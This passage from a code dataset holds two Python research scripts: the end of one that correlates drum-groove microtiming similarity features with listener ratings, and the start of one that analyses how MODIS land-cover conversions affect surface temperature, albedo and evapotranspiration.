kickT3 < hhT3 -t:\n features[13] = 1\n if snT4 > hhT4 + t:\n features[14] = 1\n if snT4 < hhT4 -t:\n features[15] = 1\n\n return features\n\ndef getHammingDistance(a, b):\n # Same as euclidean, without velocity\n binaryA = np.ceil(a)\n binaryB = np.ceil(b)\n lA,mA,hA = splitKitParts3Ways(a)\n a = np.hstack([lA,mA,hA])\n lB,mB,hB = splitKitParts3Ways(b)\n b = np.hstack([lB,mB,hB])\n return np.count_nonzero(a != b)\n\ndef splitKitParts3Ways(groove):\n kick = groove[:,0]\n snare = groove[:,1]\n closed = groove[:,2]\n open = groove[:,3]\n tom = groove[:,4]\n\n low = kick\n mid = np.nansum(np.dstack((snare,tom)),2)\n high = np.nansum(np.dstack((closed,open)),2)\n #mid = np.clip(snare + tom, 0, 1)\n #high = np.clip(closed + open, 0, 1)\n\n return low, mid, high\n\ndef getModelCorrelation(scoresBySubject, allGrooves, allNames, allTimings):\n allEuclideanDistances = []\n allEuclideanNoTiming = []\n allTimingDistances = []\n allFlexibleDistances = []\n allStyleDistances = []\n allSwingDistances = []\n j=0\n with open(\"/home/fred/BFD/python/Similarity-Eval/eval-pairings-reduced.csv\") as csvfile:\n reader = csv.reader(csvfile, delimiter=\",\")\n for row in reader:\n aName = row[0]\n bName = row[1]\n for i in range(len(allNames)):\n if allNames[i] == aName:\n a = allGrooves[i]\n aTiming = allTimings[i]\n if allNames[i] == bName:\n b = allGrooves[i]\n bTiming = allTimings[i]\n euclideanRhythmDistance = getEuclideanRhythmDistance5Parts(a,b, aTiming, bTiming)\n euclideanNoTiming = getEuclideanRhythmDistance5PartsNoTiming(a,b)\n timingDistance = getTimingDistanceAverage(aTiming,bTiming)\n flexibleEuclideanDistance = getFlexibleEuclideanDistance(a,b,aTiming,bTiming)\n styleDistance = getTimingStyle(aTiming,bTiming,aName,bName)\n swingDistance = getSwingFeatures(aTiming,bTiming,aName,bName)\n\n allEuclideanDistances.append(euclideanRhythmDistance)\n allEuclideanNoTiming.append(euclideanNoTiming)\n allTimingDistances.append(timingDistance)\n allFlexibleDistances.append(flexibleEuclideanDistance)\n allStyleDistances.append(styleDistance)\n allSwingDistances.append(swingDistance)\n\n # print(aName + \" \" + bName + ' Euclidean = ' + str(euclideanRhythmDistance) + \"Hamming = \"\n # + str(hammingDistance))\n #print(round(meanScores[j],2))\n j=j+1\n\n\n\n\n # plt.figure()\n # plt.bar(np.arange(80),np.mean(scoresBySubject, axis=0))\n #\n # plt.figure()\n # plt.hold(True)\n # plt.bar(np.arange(80),allEuclideanDistances)\n # plt.title(\"Euclidean Distances\")\n #\n # plt.figure()\n # plt.bar(np.arange(80),allHammingDistances)\n # plt.title(\"Hamming Distances\")\n #\n # plt.figure()\n # plt.bar(np.arange(80),allGomezDistances)\n # plt.title(\"Gomez Feature Distances\")\n #\n # plt.figure()\n # plt.bar(np.arange(80),allWitekDistances)\n # plt.title(\"Witek Feature Distances\")\n #\n # plt.figure()\n # plt.bar(np.arange(80),allPanteliDistances)\n # plt.title(\"Panteli Feature Distances\")\n\n plotCorrelation(np.array(allEuclideanNoTiming),np.array(allFlexibleDistances),np.array(allSwingDistances),np.array(allTimingDistances),meanScores)\n\n # coeff1, p1 = stats.spearmanr(meanScores,np.array(allEuclideanNoTiming))\n # coeff2, p2 = stats.spearmanr(meanScores,np.array(allEuclideanDistances))\n # coeff3, p3 = stats.spearmanr(meanScores,np.array(allFlexibleDistances))\n # coeff4, p4 = stats.spearmanr(np.array(allEuclideanNoTiming),np.array(allEuclideanDistances))\n coeff5, p5 = stats.spearmanr(meanScores,np.array(allTimingDistances))\n coeff6, p6 = stats.spearmanr(meanScores,np.array(allStyleDistances))\n coeff7, p7 = stats.spearmanr(meanScores,np.array(allSwingDistances))\n\n # print(\"Euclidean No Timing r: \", coeff1,p1)\n # print(\"Euclidean Timing Weighting r: \", coeff2,p2)\n # print(\"Flex Euclidean r: \", coeff3,p3)\n # print(\"Inter feature r: \", coeff4,p4)\n\n print(\"Just timing average r: \", coeff5,p5)\n print(\"Timing Style distance average r: \", coeff6,p6)\n print(\"Swing feature distance r: \", coeff7,p7)\n\ndef plotCorrelation(a,b,c,d, scores):\n plt.figure()\n #plt.hold()\n\n #plt.scatter(a/8.0,scores,marker='x')\n #plt.scatter(b/8.0,scores,marker='x')\n plt.scatter(c,scores,marker='x')\n #plt.scatter(d/1.75,scores,marker='x')\n plt.title(\"Swing Feature vs Similarity Ratings Correlation for 80 Loop Pairs\")\n plt.ylabel(\"Ratings\")\n plt.xlabel(\"Feature score\")\n plt.show()\n\ndef getResultsPerPair(scoresByPair):\n # tested, works\n for i in range(80): #just non-repeated ones\n with open(('/home/fred/BFD/python/MusicSOM/ratings/' + ratingFiles[i])) as csvfile:\n reader = csv.reader(csvfile, delimiter=\",\") #so far 21 participants\n j = 0\n for row in reader:\n if row[0] in (None, \"\"):\n pass\n elif row[0] == \"file_keys\":\n pass\n elif j < 21:\n scoresByPair[i,j] = row[1]\n j+=1\n return scoresByPair\n\nnp.set_printoptions(precision=2)\n\nallNames = np.load('Eval-Groove-names.npy')\nallGrooves = np.load('Eval-Groove-velocity-matricies.npy')\nallTimings = np.load('Eval-Groove-timing-matricies.npy')\n\nratingFiles = os.listdir('/home/fred/BFD/python/MusicSOM/ratings')\n\nratingFiles.sort() #alphabetize\nratingFiles = ratingFiles[10:90]\nscoresByPair = np.zeros([80,21])\n\n\nscoresBySubject = getResultsPerPair(scoresByPair).T\nmeanScores = 1.0 - np.mean(scoresBySubject, axis=0)\nprint(meanScores)\n\ngetModelCorrelation(scoresBySubject, allGrooves, allNames, allTimings)\n","sub_path":"Microtiming-Feature-Testing.py","file_name":"Microtiming-Feature-Testing.py","file_ext":"py","file_size_in_byte":19717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"194982765","text":"\"\"\"\r\n\r\nThis script is mainly for analyzing the results of the Max_Change_Analyses.py\r\nThe main goal is to plot the changes in ET, albedo and LST following a major change in LUC\r\n\r\nThere are seven classes in general which in this scriot is numbered from 1 to 7 where numbers are: \r\n1: EF (Evergreen forest); 2:DF (Decisuous forest); 3:shrub; \r\n4: Herbacious; 5:sparse; 6:wetland; and 7:water \r\n\r\n\"\"\"\r\n# Loading the libraries\r\nimport xarray as xr\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pylab as plt\r\n\r\n'''---------------------------------------------------------\r\n\t\t\t\t\t\t\tParameters\r\n---------------------------------------------------------'''\r\nanalyses_mode = \"Growing\" \r\nLUC_Type = [\r\n\t\"Evergreen Forest\",\r\n\t\"Deciduous Forest\", \r\n\t\"Shrub\",\r\n\t\"Herbaceous\",\r\n\t\"Sparse\",\r\n\t\"Wetland\",\r\n\t\"Water\"\r\n\t]\r\n\r\n'''---------------------------------------------------------\r\n\t\t\t\t\t\t\tPrepare data\r\n---------------------------------------------------------'''\r\nprint('----------------- Preparing data -----------------\\n')\r\nin_dir = \"/data/home/hamiddashti/mnt/nasa_above/working/modis_analyses/Data/\"\r\nout_dir = \"/data/home/hamiddashti/mnt/nasa_above/working/modis_analyses/outputs/\"\r\nfig_dir = out_dir + \"Main_Max_Change/Figures/\"+analyses_mode+\"/\"\r\n\r\nif analyses_mode==\"Growing\":\r\n\tprint(\"Analyses mode is set to Growing, meaning we are working on the growing season (Apr-Nov; seven months)\\n\")\r\nelif analyses_mode==\"Annual\":\r\n\tprint(\"Analyses mode is set to Annual, meaning we are working on the annual data (Jan-Dec)\\n\")\r\nprint(f\"Input directory:{in_dir}\")\r\nprint(f\"Output directory:{out_dir}\")\r\nprint(f\"Figure directory:{fig_dir}\\n\")\r\n\r\nprint(\"Working on LST...\")\r\n# importing LST (natural and LUC components)\r\nlst_lulc = xr.open_dataarray(\r\n\tout_dir\r\n\t+ \"Natural_Variability/Natural_Variability_\"+analyses_mode+\"_outputs/delta_lst_changed_lulc_component.nc\"\r\n)\r\n\r\nlst_nv = xr.open_dataarray(\r\n\tout_dir\r\n\t+ \"Natural_Variability/Natural_Variability_\"+analyses_mode+\"_outputs/delta_lst_changed_nv_component.nc\"\r\n)\r\nlst_diff_total = xr.open_dataarray(\r\n\tout_dir\r\n\t+ \"Natural_Variability/Natural_Variability_\"+analyses_mode+\"_outputs/delta_lst_total.nc\"\r\n)\r\nlst = (\r\n\txr.open_dataarray(in_dir +analyses_mode+\"/\"+analyses_mode+\"_LST/lst_mean_\"+analyses_mode+\".nc\") - 273.15\r\n) # kelvin to C\r\nlst = lst.sel(year=slice(\"2003\", \"2014\"))\r\nlst = lst.rename({\"lat\": \"y\", \"lon\": \"x\"})\r\n\r\nprint(\"Working on albedo...\")\r\nalbedo = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_Albedo/Albedo_\"+analyses_mode+\".nc\")\r\nalbedo = albedo.sel(year=slice(\"2003\", \"2014\"))\r\nalbedo_diff = albedo.diff(\"year\")\r\n\r\nprint(\"Working on ET and its components...\\n\")\r\nEC = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/EC_\"+analyses_mode+\".nc\") # Vegetation transpiration\r\nEI = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/EI_\"+analyses_mode+\".nc\") # Vegetation transpiration\r\nES = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/ES_\"+analyses_mode+\".nc\") # Vegetation transpiration\r\nEW = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/EW_\"+analyses_mode+\".nc\") # Vegetation transpiration\r\nET = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/ET_\"+analyses_mode+\".nc\") # Vegetation transpiration\r\nEC = EC.fillna(0)\r\nEI = EI.fillna(0)\r\nES = ES.fillna(0)\r\nEW = EW.fillna(0)\r\n\r\nECI = EC + EI # canopy evapotranspiration\r\nESW = ES + EW # soil/water/ice/snow evaporation\r\n\r\nEC = EC.where(EC != 0) # Convert zeros to nan\r\nEI = EI.where(EI != 0)\r\nES = ES.where(ES != 0)\r\nEW = EW.where(EW != 0)\r\nET = ET.where(ET != 0)\r\nECI = ECI.where(ECI != 0)\r\nESW = ESW.where(ESW != 0)\r\n#Take the difference in ET \r\nEC_diff = EC.diff(\"year\")\r\nEI_diff = EI.diff(\"year\")\r\nES_diff = ES.diff(\"year\")\r\nEW_diff = EW.diff(\"year\")\r\nET_diff = ET.diff(\"year\")\r\nECI_diff = ECI.diff(\"year\")\r\nESW_diff = ESW.diff(\"year\")\r\n\r\n# EW.isel(year=1).to_netcdf(out_dir+\"test2_ew.nc\")\r\n# This is a netcdf file that shows all the extreme conversions calculated using the \"Max_Change_Analyses.py\"\r\nconversions = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/conversions_Table.nc\"\r\n)\r\n\r\nconversions_sum = conversions.sum(\"year\")\r\nconversions_sum = pd.DataFrame(data = conversions_sum.values,index = LUC_Type,columns=LUC_Type)\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"w\") as text_file:\r\n print(\"Number of pixles undergone extreme conversion. Rows/columns are\\\r\n classes before/after conversion (Table XXXX in the paper):\",\r\n file=text_file,\r\n )\r\n print(conversions_sum, file=text_file)\r\ntext_file.close()\r\nprint(\"Number of pixles undergone extreme conversion. Rows/columns are\\\r\n classes before/after conversion (Table XXXX in the paper):\")\r\nprint(conversions_sum)\r\n\r\n# Calling the results of the Max_Changed_Analyses.py\r\nEF = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/EF_to_other.nc\"\r\n)\r\nshrub = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/shrub_to_other.nc\"\r\n)\r\nherb = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/herb_to_other.nc\"\r\n)\r\nsparse = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/sparse_to_other.nc\"\r\n)\r\nwetland = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/wetland_to_other.nc\"\r\n)\r\nwater = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/water_to_other.nc\"\r\n)\r\nDF = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/DF_to_other.nc\"\r\n)\r\n\r\n# This is the map of water_energy limited areas with two classes\r\nWL_EL = xr.open_dataarray(\r\n\tin_dir + \"Water_Energy_Limited/Tif/WL_EL_Reclassified_reproject.nc\"\r\n)\r\nWL_EL = WL_EL.squeeze() \r\n\r\n'''----------------------------------------------------------------------------\r\n\t\t\t\t\tFunctions used in various part of teh script\r\n----------------------------------------------------------------------------'''\r\ndef find_coord(da, val, n):\r\n\t\"\"\"\r\n\tFind a specific value in xarray object and returns its coordinate\r\n\tda --> xarray object\r\n\tval --> interested values to be find in da\r\n\tn --> index of a number if there are multiple of replicate of the val\r\n\t\"\"\"\r\n\ttmp = da.where(da == val, drop=True)\r\n\ttmp_stack = tmp.stack(z=[\"x\", \"y\"])\r\n\ta = tmp_stack[tmp_stack.notnull()][n]\r\n\tb = a.coords[\"z\"].values\r\n\tx = b.tolist()[0]\r\n\ty = b.tolist()[1]\r\n\treturn x, y\r\ndef plot_example(changed, not_changed, var, outname):\r\n\t# plot the example pixel (for presentations only)\r\n\tchanged.plot()\r\n\tnot_changed.plot()\r\n\tplt.axvline(2003, color=\"k\", linestyle=\"--\")\r\n\tplt.axvline(2006, color=\"r\", linestyle=\"--\")\r\n\tplt.axvline(2007, color=\"r\", linestyle=\"--\")\r\n\tplt.xlabel(\"Time\")\r\n\tplt.ylabel(var)\r\n\tplt.legend([\"LUC changed\", \"LUC not changed\"])\r\n\tplt.savefig(fig_dir + outname)\r\n\tplt.close()\r\ndef make_mask(data):\r\n\t# Filter data using np.isnan\r\n\tmask = ~np.isnan(data)\r\n\tfiltered_data = [d[m] for d, m in zip(data.T, mask.T)]\r\n\treturn filtered_data\r\ndef extract_vals(orig_class, val, var, conv_name):\r\n\t\"\"\"\r\n\tvar ---> Name of the varaibke we are interested to extract (lst/albedo/ET)\r\n\tval ---> Name of the class after convrsion of the original class (orig_class)\r\n\torig_class ---> the xarray object of original class conversion from Max_Change_Anlyses.py\r\n\tconv_name ---> conversion name\r\n\t\"\"\"\r\n\timport numpy as np\r\n\r\n\tif var == \"lst\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp_lst = tmp_lst[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp_lst}, columns=[conv_name])\r\n\telif var == \"albedo\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = albedo_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"ec\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = EC_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"ei\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = EI_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"es\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = ES_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"ew\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = EW_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"et\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = ET_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"eci\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = ECI_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\telif var == \"esw\":\r\n\t\ttmp_lst = lst_lulc.where(orig_class == val, drop=True).values\r\n\t\ttmp = ESW_diff.where(orig_class == val, drop=True).values\r\n\t\ttmp = tmp[~np.isnan(tmp_lst)]\r\n\t\ttmp_df = pd.DataFrame({conv_name: tmp}, columns=[conv_name])\r\n\treturn tmp_df\r\ndef myboxplot(df, title, ylabel, margin, outname):\r\n\tdf_mean = np.round(df.mean().values, 2)\r\n\tdf_sd = np.round(df.std().values, 2)\r\n\tq = df.quantile(q=0.75).values\r\n\tax = df.boxplot(figsize=(16, 10))\r\n\tpos = range(len(df_mean))\r\n\tfor tick, label in zip(pos, ax.get_xticklabels()):\r\n\t\tax.text(\r\n\t\t\tpos[tick] + 1,\r\n\t\t\tq[tick] + margin,\r\n\t\t\tstr(df_mean[tick]) + \"$\\pm$\" + str(df_sd[tick]),\r\n\t\t\thorizontalalignment=\"right\",\r\n\t\t\tfontsize=12,\r\n\t\t\tcolor=\"k\",\r\n\t\t\tweight=\"bold\",\r\n\t\t)\r\n\r\n\tplt.xticks(rotation=45, fontsize=16)\r\n\tplt.title(title, fontsize=20)\r\n\tplt.ylabel(ylabel, fontsize=16)\r\n\tplt.tight_layout()\r\n\tplt.savefig(fig_dir + outname)\r\n\tplt.close()\r\n\r\ndef myboxplot_group(df1, df2, df3, columns, txt_pos, outname):\r\n\r\n\tfig, ax1 = plt.subplots(figsize=(16, 8))\r\n\twidths = 0.3\r\n\tdf1_mean = np.round(df1[\"df\"].mean().values, 2)\r\n\tdf1_sd = np.round(df1[\"df\"].std().values, 2)\r\n\tdf2_mean = np.round(df2[\"df\"].mean().values, 2)\r\n\tdf2_sd = np.round(df2[\"df\"].std().values, 2)\r\n\tdf3_mean = np.round(df3[\"df\"].mean().values, 2)\r\n\tdf3_sd = np.round(df3[\"df\"].std().values, 2)\r\n\r\n\tax1.set_ylabel(df1[\"label\"], color=\"tab:orange\", fontsize=16)\r\n\tax1.set_ylim(df1[\"ylim\"])\r\n\tax1.yaxis.set_tick_params(labelsize=12)\r\n\t# Filtering nan valuse for matplotlib boxplot\r\n\tfiltered_df1 = make_mask(df1[\"df\"].values)\r\n\tres1 = ax1.boxplot(\r\n\t\tfiltered_df1,\r\n\t\twidths=widths,\r\n\t\tpositions=np.arange(len(columns)) - 0.31,\r\n\t\tpatch_artist=True,\r\n\t)\r\n\tfor element in [\"boxes\", \"whiskers\", \"fliers\", \"means\", \"medians\", \"caps\"]:\r\n\t\tplt.setp(res1[element], color=\"k\")\r\n\tfor patch in res1[\"boxes\"]:\r\n\t\tpatch.set_facecolor(\"tab:orange\")\r\n\r\n\t# Here we add the mean and std information to the plot\r\n\tpos = range(len(df1_mean))\r\n\tfor tick, label in zip(pos, ax1.get_xticklabels()):\r\n\t\tax1.text(\r\n\t\t\tpos[tick],\r\n\t\t\t# q[tick] + (q[tick]-lst_mean[tick])/2,\r\n\t\t\ttxt_pos,\r\n\t\t\tdf1[\"name\"]\r\n\t\t\t+ \" = \"\r\n\t\t\t+ str(df1_mean[tick])\r\n\t\t\t+ \"$\\pm$\"\r\n\t\t\t+ str(df1_sd[tick])\r\n\t\t\t+ \"\\n\"\r\n\t\t\t+ df2[\"name\"]\r\n\t\t\t+ \" = \"\r\n\t\t\t+ str(df2_mean[tick])\r\n\t\t\t+ \"$\\pm$\"\r\n\t\t\t+ str(df2_sd[tick])\r\n\t\t\t+ \"\\n\"\r\n\t\t\t+ df3[\"name\"]\r\n\t\t\t+ \" = \"\r\n\t\t\t+ str(df3_mean[tick])\r\n\t\t\t+ \"$\\pm$\"\r\n\t\t\t+ str(df3_sd[tick])\r\n\t\t\t+ \"\\n\",\r\n\t\t\thorizontalalignment=\"center\",\r\n\t\t\tfontsize=8,\r\n\t\t\tcolor=\"k\",\r\n\t\t\tweight=\"semibold\",\r\n\t\t)\r\n\tax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\tax2.set_ylim(df2[\"ylim\"])\r\n\tax2.set_ylabel(df2[\"label\"], color=\"tab:blue\", fontsize=16)\r\n\tax2.yaxis.set_tick_params(labelsize=12)\r\n\tfiltered_df2 = make_mask(df2[\"df\"].values)\r\n\tres2 = ax2.boxplot(\r\n\t\tfiltered_df2,\r\n\t\tpositions=np.arange(len(columns)) + 0,\r\n\t\twidths=widths,\r\n\t\tpatch_artist=True,\r\n\t)\r\n\t##from https://stackoverflow.com/a/41997865/2454357\r\n\tfor element in [\"boxes\", \"whiskers\", \"fliers\", \"means\", \"medians\", \"caps\"]:\r\n\t\tplt.setp(res2[element], color=\"k\")\r\n\tfor patch in res2[\"boxes\"]:\r\n\t\tpatch.set_facecolor(\"tab:blue\")\r\n\t# To make the border of the right-most axis visible, we need to turn the frame\r\n\t# on. This hides the other plots, however, so we need to turn its fill off.\r\n\tax3 = ax1.twinx() # instantiate a second axes that shares the same x-axis\r\n\tax3.set_ylim(df3[\"ylim\"])\r\n\tax3.spines[\"right\"].set_position((\"axes\", 1.1))\r\n\tax3.set_frame_on(True)\r\n\tax3.patch.set_visible(False)\r\n\tax3.set_ylabel(df3[\"label\"], color=\"tab:green\", fontsize=16)\r\n\tax3.yaxis.set_tick_params(labelsize=12)\r\n\tfiltered_df3 = make_mask(df3[\"df\"].values)\r\n\tres3 = ax3.boxplot(\r\n\t\tfiltered_df3,\r\n\t\tpositions=np.arange(len(columns)) + 0.31,\r\n\t\twidths=widths,\r\n\t\tpatch_artist=True,\r\n\t)\r\n\t##from https://stackoverflow.com/a/41997865/2454357\r\n\tfor element in [\"boxes\", \"whiskers\", \"fliers\", \"means\", \"medians\", \"caps\"]:\r\n\t\tplt.setp(res3[element], color=\"k\")\r\n\tfor patch in res3[\"boxes\"]:\r\n\t\tpatch.set_facecolor(\"tab:green\")\r\n\tax1.set_xlim([-0.55, len(columns) - 0.25])\r\n\tax1.set_xticks(np.arange(len(columns)))\r\n\tax1.set_xticklabels(columns, rotation=50, fontsize=11)\r\n\tax1.yaxis.grid(False)\r\n\tax1.axhline(color=\"k\")\r\n\tfig.tight_layout() # otherwise the right y-label is slightly clipped\r\n\tplt.savefig(fig_dir + outname)\r\n\tplt.close()\r\n\r\ndef ELvsWL(var, orig_class, val, WL_EL_class):\r\n\t'''\r\n\tvar --------->\tName of variable to be extracted (lst, albedo)\r\n\torig_class -->\tName of the conversion (EF, DF, shrub etc)\r\n\tval --------->\tClass number after conversion of the orig_class\r\n\tWL_EL_Class -> 1:Water limited; 2:water limited \r\n\r\n\t'''\r\n\tif var == \"lst\":\r\n\t\ttry:\r\n\t\t\ttmp_lst = lst_lulc.where(\r\n\t\t\t\t(orig_class == val) & (WL_EL == WL_EL_class), drop=True\r\n\t\t\t).values\r\n\t\t\ttmp = tmp_lst[~np.isnan(tmp_lst)]\r\n\t\t\ttmp_df = pd.DataFrame({class_name[WL_EL_class - 1]: tmp})\r\n\t\texcept ValueError:\r\n\t\t\t# tmp_df = pd.DataFrame({class_name[WL_EL_class-1]: np.nan})\r\n\t\t\ttmp_df = pd.DataFrame(\r\n\t\t\t\tnp.nan, index=[0], columns=[class_name[WL_EL_class - 1]]\r\n\t\t\t)\r\n\t# \treturn tmp_df\r\n\tif var == \"albedo\":\r\n\t\ttry:\r\n\t\t\ttmp_albedo = albedo_diff.where(\r\n\t\t\t\t(orig_class == val) & (WL_EL == WL_EL_class), drop=True\r\n\t\t\t).values\r\n\t\t\ttmp = tmp_albedo[~np.isnan(tmp_albedo)]\r\n\t\t\ttmp_df = pd.DataFrame({class_name[WL_EL_class - 1]: tmp})\r\n\t\texcept ValueError:\r\n\t\t\t# tmp_df = pd.DataFrame({class_name[WL_EL_class-1]: np.nan})\r\n\t\t\ttmp_df = pd.DataFrame(\r\n\t\t\t\tnp.nan, index=[0], columns=[class_name[WL_EL_class - 1]]\r\n\t\t\t)\r\n\t# \treturn tmp_df\r\n\r\n\tif var == \"et\":\r\n\t\ttry:\r\n\t\t\ttmp_et = ET_diff.where(\r\n\t\t\t\t(orig_class == val) & (WL_EL == WL_EL_class), drop=True\r\n\t\t\t).values\r\n\t\t\ttmp = tmp_et[~np.isnan(tmp_et)]\r\n\t\t\ttmp_df = pd.DataFrame({class_name[WL_EL_class - 1]: tmp})\r\n\t\texcept ValueError:\r\n\t\t\t# tmp_df = pd.DataFrame({class_name[WL_EL_class-1]: np.nan})\r\n\t\t\ttmp_df = pd.DataFrame(\r\n\t\t\t\tnp.nan, index=[0], columns=[class_name[WL_EL_class - 1]]\r\n\t\t\t)\r\n\t# \treturn tmp_df\r\n\treturn tmp_df\r\ndef extract_wl_el(orig_class, val):\r\n\tlst_EL_WL = []\r\n\talbedo_EL_WL = []\r\n\tet_EL_WL = []\r\n\tfor i in np.arange(1, 3):\r\n\t\tprint(i)\r\n\r\n\t\tdf_lst = ELvsWL(var=\"lst\", orig_class=orig_class, val=val, WL_EL_class=i)\r\n\r\n\t\t# if number of pixles are less than 25 (25% of the 100 minimum)\r\n\t\t# we ignore the EL_WL analysis in the LUC conversion\r\n\t\tif len(df_lst) < 25:\r\n\t\t\tprint(\r\n\t\t\t\tf\"There is not enough pixels in the {class_name[i - 1]} area to make robust conclusions\"\r\n\t\t\t)\r\n\t\t\treturn\r\n\r\n\t\telse:\r\n\t\t\tdf_albedo = ELvsWL(\r\n\t\t\t\tvar=\"albedo\", orig_class=orig_class, val=val, WL_EL_class=i\r\n\t\t\t)\r\n\t\t\tdf_et = ELvsWL(var=\"et\", orig_class=orig_class, val=val, WL_EL_class=i)\r\n\t\t\tlst_EL_WL.append(\r\n\t\t\t\tpd.Series(df_lst[class_name[i - 1]], name=class_name[i - 1])\r\n\t\t\t)\r\n\t\t\talbedo_EL_WL.append(\r\n\t\t\t\tpd.Series(df_albedo[class_name[i - 1]], name=class_name[i - 1])\r\n\t\t\t)\r\n\t\t\tet_EL_WL.append(pd.Series(df_et[class_name[i - 1]], name=class_name[i - 1]))\r\n\r\n\tlst_EL_WL = pd.concat(lst_EL_WL, axis=1)\r\n\talbedo_EL_WL = pd.concat(albedo_EL_WL, axis=1)\r\n\tet_EL_WL = pd.concat(et_EL_WL, axis=1)\r\n\treturn lst_EL_WL, albedo_EL_WL, et_EL_WL\r\n\r\n\"\"\" ---------------------------------------------------------------------\r\nRegional analyses: The main criteria is that a LUC should include more \r\nthan 50 pixels that we can make robust conclusions \r\n----------------------------------------------------------------------\"\"\"\r\n\r\nprint('\\n----------------- Working on the entire region (takes several minutes/hours) -----------------\\n')\r\ncolumns = [\r\n\t\"EF_to_Shrub\",\r\n\t# \"EF_to_Herb\", \t\t# We ignore this conversions since the number of pixels including this conversion is less than 50\r\n\t\"EF_to_Sparse\",\r\n\t# \"DF_to_Shrub\", \t\t# We ignore this conversions since the number of pixels including this conversion is less than 50\r\n\t\"DF_to_Herb\",\r\n\t\"DF_to_Sparse\",\r\n\t\"Shrub_to_Sparse\",\r\n\t# \"Shrub_to_Wetland\",\t# We ignore this conversions since the number of pixels including this conversion is less than 50\r\n\t\"Herb_to_Shrub\",\r\n\t\"Herb_to_Sparse\",\r\n\t# \"Herb_to_Wetland\",\t# We ignore this conversions since the number of pixels including this conversion is less than 50\r\n\t\"Sparse_to_Shrub\",\r\n\t\"Sparse_to_Herb\",\r\n\t\"Wetland_to_Sparse\",\r\n\t# \"Water_to_Sparse\",\t# We ignore this conversions since the number of pixels including this conversion is less than 50\r\n\t# \"Water_to_Wetland\",\t# We ignore this conversions since the number of pixels including this conversion is less than 50\r\n]\r\n\r\ntmp_lst = lst_lulc.where(EF == 3, drop=True).values\r\nlst_EF_to_shrub = extract_vals(\r\n\torig_class=EF, val=3, var=\"lst\", conv_name=\"lst_EF_to_shrub\"\r\n)\r\n# lst_EF_to_herb = extract_vals(\r\n# orig_class=EF, val=4, var=\"lst\", conv_name=\"lst_EF_to_herb\"\r\n# )\r\nlst_EF_to_sparse = extract_vals(\r\n\torig_class=EF, val=5, var=\"lst\", conv_name=\"lst_EF_to_sparse\"\r\n)\r\n\r\n# lst_DF_to_shrub = extract_vals(DF, 3, \"lst\", \"lst_DF_to_shrub\")\r\nlst_DF_to_herb = extract_vals(\r\n\torig_class=DF, val=4, var=\"lst\", conv_name=\"lst_DF_to_herb\"\r\n)\r\nlst_DF_to_sparse = extract_vals(\r\n\torig_class=DF, val=5, var=\"lst\", conv_name=\"lst_DF_to_sparse\"\r\n)\r\n\r\nlst_shrub_to_sparse = extract_vals(\r\n\torig_class=shrub, val=5, var=\"lst\", conv_name=\"lst_shrub_to_sparse\"\r\n)\r\n# lst_shrub_to_wetland = extract_vals(\r\n# orig_class=shrub, val=6, var=\"lst\", conv_name=\"lst_shrub_to_wetland\"\r\n# )\r\n\r\nlst_herb_to_shrub = 